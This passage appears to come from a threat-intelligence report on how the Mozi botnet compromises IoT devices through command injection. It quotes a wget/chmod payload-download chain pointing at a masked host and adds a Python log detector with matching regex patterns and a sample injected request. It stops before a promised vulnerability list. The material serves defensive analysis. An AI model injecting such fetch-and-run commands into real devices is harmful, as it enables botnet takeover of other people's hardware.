2020-09-17

Nearly all IBM-observed IoT targeting attempted to use CMDi attacks to gain initial access to the device. If the targeted endpoint was an IoT device susceptible to these attacks, the payload was downloaded and executed.

CMDi attacks are extremely popular against IoT devices for several reasons. First, IoT embedded systems commonly contain a web interface and a debugging interface left over from firmware development that can be exploited. Second, PHP modules built into IoT web interfaces can be exploited to give malicious actors remote execution capability. Third, IoT interfaces are often deployed without being hardened: administrators fail to validate or sanitize the remote input the interface expects, which lets threat actors inject shell commands such as “wget”.

Our analysis revealed the Mozi botnet leverages CMDi by using a “wget” shell command, then altering permissions to allow the threat actor to interact with the affected system. For example:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

If the host was vulnerable to CMDi, this command would download and execute a file called “mozi.a”. Our analysis of this particular sample indicates the file is built for the microprocessor without interlocked pipelined stages (MIPS) architecture, a reduced instruction set computer (RISC) architecture that is prevalent on many IoT devices. Once the attacker gains full access to the device through the botnet, the firmware can be modified and additional malware can be planted on the device.
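As an added illustration (not part of IBM's analysis or the Mozi sample), the following Python detector flags requests carrying the wget/chmod/rm CMDi chain described above when run over web-interface access logs. The combined log format, the regular expressions and the sample log lines are assumptions constructed for this example; the host in the sample URL is a placeholder, as on this page.

```python
import re
from urllib.parse import unquote_plus

# Shell constructs the observed CMDi chain relies on: a command separator
# followed by a fetch, permission-change or cleanup command.
SEPARATOR = r"(?:;|\|\||&&|\||`|\$\()"
COMMANDS = r"(?:wget|curl|tftp|chmod|rm)\b"
CMDI_RE = re.compile(SEPARATOR + r"\s*" + COMMANDS, re.IGNORECASE)
# Staging in a tmp directory or making the payload world-executable.
STAGING_RE = re.compile(r"/(?:var/)?tmp/\S*|chmod\s+777", re.IGNORECASE)

# Combined access-log request field: "METHOD target HTTP/x.y" status
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def decode_layers(s, rounds=3):
    """URL-decode repeatedly; injected payloads are often double-encoded."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(line):
    """Return the reasons a log line looks like IoT command injection (empty if none)."""
    m = LOG_RE.search(line)
    if not m:
        return []
    target = decode_layers(m.group("target"))
    reasons = []
    if CMDI_RE.search(target):
        reasons.append("shell separator followed by fetch/chmod/rm")
    if STAGING_RE.search(target):
        reasons.append("payload staged in tmp or made world-executable")
    return reasons


def scan(lines):
    """Pair each suspicious line with its reasons."""
    return [(line, classify(line)) for line in lines if classify(line)]


# Constructed sample log lines; the second mirrors the chain quoted in the text.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Sep/2020:10:00:00 +0000] "GET /index.php?page=status HTTP/1.1" 200 512',
    '10.0.0.9 - - [17/Sep/2020:10:00:01 +0000] "GET /cgi-bin/ping.cgi?host=127.0.0.1;wget%20http://xxx.xx.xxx.xxx/bins/mozi.a%20-o%20/var/tmp/mozi.a;chmod%20777%20/var/tmp/mozi.a HTTP/1.1" 200 0',
    '10.0.0.9 - - [17/Sep/2020:10:00:02 +0000] "POST /login.cgi HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_LOG):
        print(reasons, line)
```

The `decode_layers` step matters in practice: a single `unquote` misses payloads that were percent-encoded twice to slip past naive filters.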

Although this example cites a well-known vector, it can continue to be effective for two main reasons. First, newly disclosed vulnerabilities allow exploitation attempts via CMDi to be updated constantly, and slow patch rollout leaves devices exposed. Second, this activity is easily automated, allowing threat actors to hit a broad swath of devices quickly at low cost.

The Mozi botnet infrastructure appears primarily sourced in China, accounting for 84% of observed infrastructure. This fact aligns with other open-source research into IoT activity in 2020.

Below is a list of vulnerabilities IBM has observed the Mozi botnet attempting to exploit: